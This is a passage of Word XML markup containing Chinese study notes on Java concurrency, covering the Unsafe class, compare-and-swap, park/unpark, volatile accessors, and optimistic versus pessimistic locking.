          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>类，就可以像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>C, C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>一样精确地操作内存。当然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的一大优点就是可以安全的操作内存，所以不提倡开发者直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>本身的类很多都利用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>来进行底层操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>和并发编程相关的有几类方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1. CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>操作条件队列的方法，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>park()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>让线程进入等待，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>unpark()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>唤醒线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>存取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>变量的方法，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>getBooleanVolatile, putBooleanVolatile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51ACF" w:rsidRPr="00B776C4" w:rsidRDefault="00E51ACF" w:rsidP="003E7BC7">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Compare And Swap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51ACF" w:rsidRDefault="00E51ACF" w:rsidP="00E51ACF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="210" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">       CAS </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指的是现代</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>广泛支持的一种对内存中的共享数据进行操作的一种特殊指令。这个指令会对内存中的共享数据做原子的读写操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单介绍一下这个指令的操作过程：首先，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会将内存中将要被更改的数据与期望的值做比较。然后，当这两个值相等时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才会将内存中的数值替换为新的值。否则便不做操作。最后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会将旧的数值返回。这一系列的操作是原子的。它们虽然看似复杂，但却是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并发机制优于原有锁机制的根本。简单来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CAS </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的含义是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我认为原有的值应该是什么，如果是，则将原有的值更新为新值，否则不做修改，并告诉我原来的值是多少</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。（这段描述引自《</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并发编程实践》）</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单的来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个操作数，内存值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，旧的预期值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，要修改的新值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当且仅当预期值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和内存值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相同时，将内存值</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，否则返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这是一种乐观锁的思路，它相信在它修改之前，没有其它线程去修改它；而</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是一种悲观锁，它认为在它修改之前，一定会有其它线程去修改它，悲观锁效率很低</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。下面来看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AtomicInteger</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是如何利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B776C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现原子性操作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0E54" w:rsidRPr="00927641" w:rsidRDefault="00014719" w:rsidP="00BE0E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3.4.2</w:t>
      </w:r>
      <w:r w:rsidR="00BE0E54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAS</w:t>
      </w:r>
      <w:r w:rsidR="00BE0E54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0E54" w:rsidRPr="003D3504" w:rsidRDefault="00C647EE" w:rsidP="005E3EF2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是单词</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>compare and set</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的缩写，意思是指在</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之前先比较该值有没有变化，只有在没变的情况下才对其赋值</w:t>
      </w:r>
